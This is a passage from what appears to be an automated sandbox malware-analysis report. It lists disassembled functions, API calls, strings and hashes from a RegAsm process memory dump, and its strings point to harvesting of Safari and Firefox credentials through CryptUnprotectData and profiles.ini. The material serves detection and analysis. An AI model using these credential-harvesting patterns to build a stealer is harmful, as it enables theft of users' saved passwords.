                                                                                • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                • API String ID: 2257402768-1134094380
                                                                                • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                • String ID: :stringdata$ftp://$http://$https://
                                                                                • API String ID: 2787044678-1921111777
                                                                                • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                • GetDC.USER32 ref: 004140E3
                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                • String ID: %s:$EDIT$STATIC
                                                                                • API String ID: 2080319088-3046471546
                                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                • memset.MSVCRT ref: 00413292
                                                                                • memset.MSVCRT ref: 004132B4
                                                                                • memset.MSVCRT ref: 004132CD
                                                                                • memset.MSVCRT ref: 004132E1
                                                                                • memset.MSVCRT ref: 004132FB
                                                                                • memset.MSVCRT ref: 00413310
                                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                • memset.MSVCRT ref: 004133C0
                                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                • memcpy.MSVCRT ref: 004133FC
                                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                                Strings
                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                • {Unknown}, xrefs: 004132A6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                • API String ID: 4111938811-1819279800
                                                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                • SetCursor.USER32(00000000), ref: 0040129E
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                • String ID:
                                                                                • API String ID: 829165378-0
                                                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                                • memset.MSVCRT ref: 00404200
                                                                                • memset.MSVCRT ref: 00404215
                                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                                • wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 0040426E
                                                                                • memset.MSVCRT ref: 004042CD
                                                                                • memset.MSVCRT ref: 004042E2
                                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                                • wcscpy.MSVCRT ref: 00404311
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                • API String ID: 2454223109-1580313836
                                                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                • memcpy.MSVCRT ref: 004115C8
                                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                • API String ID: 4054529287-3175352466
                                                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                • API String ID: 2000436516-3842416460
                                                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                • String ID:
                                                                                • API String ID: 1043902810-0
                                                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                • memset.MSVCRT ref: 0040E380
                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                                • memcpy.MSVCRT ref: 0040E3EC
                                                                                • memcpy.MSVCRT ref: 0040E407
                                                                                • memcpy.MSVCRT ref: 0040E422
                                                                                • memcpy.MSVCRT ref: 0040E43D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                • API String ID: 3073804840-2252543386
                                                                                • Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                • Opcode Fuzzy Hash: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                • API String ID: 2899246560-1542517562
                                                                                • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                • String ID:
                                                                                • API String ID: 3715365532-3916222277
                                                                                • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                • memset.MSVCRT ref: 004085CF
                                                                                • memset.MSVCRT ref: 004085F1
                                                                                • memset.MSVCRT ref: 00408606
                                                                                • strcmp.MSVCRT ref: 00408645
                                                                                • _mbscpy.MSVCRT ref: 004086DB
                                                                                • _mbscpy.MSVCRT ref: 004086FA
                                                                                • memset.MSVCRT ref: 0040870E
                                                                                • strcmp.MSVCRT ref: 0040876B
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                • String ID: ---
                                                                                • API String ID: 3437578500-2854292027
                                                                                • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041087D
                                                                                • memset.MSVCRT ref: 00410892
                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                • String ID:
                                                                                • API String ID: 1010922700-0
                                                                                • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                • malloc.MSVCRT ref: 004186B7
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                • malloc.MSVCRT ref: 004186FE
                                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                Strings
                                                                                Memory Dump Source
